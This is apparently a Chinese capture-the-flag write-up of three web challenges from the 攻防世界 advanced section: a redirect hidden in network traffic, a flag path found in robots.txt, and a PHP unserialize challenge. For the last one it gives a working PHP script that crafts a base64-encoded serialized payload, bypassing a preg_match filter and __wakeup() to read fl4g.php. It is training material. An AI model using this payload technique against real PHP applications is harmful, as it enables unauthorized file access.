攻防世界-高手进阶(持续更新)

baby_web

题目描述：想想初始页面是哪个 点击题目链接，发现跳转到了/1.php 所以我们用F12点击network来看看流量包

Training-WWW-Robots

唔。又是robots。。。。。没啥意思直接访问/robots.txt就能看到一个包含有flag的地址了

Web_php_unserialize

一看标题就知道这里的考点是php反序列化了.BUT这里我学的不是很好。附上一个链接https://blog.csdn.net/Mr_helloword/article/details/107923630你们可以看看这个博主的分析 大家测试时候可以用一下代码

?php 
class Demo {
     
    private $file = 'fl4g.php';

}
    

$x= serialize(new Demo);
    
$x=str_replace('O:4', 'O:+4',$x);
    //绕过preg_match()
$x=str_replace(':1:', ':3:',$x);
    //绕过__wakeup()
echo base64_encode($x);
    
?>
    

再附上序列化含义图

声明：本文内容由网友自发贡献，本站不承担相应法律责任。对本内容有异议或投诉，请联系2913721942#qq.com核实处理，我们将尽快回复您，谢谢合作！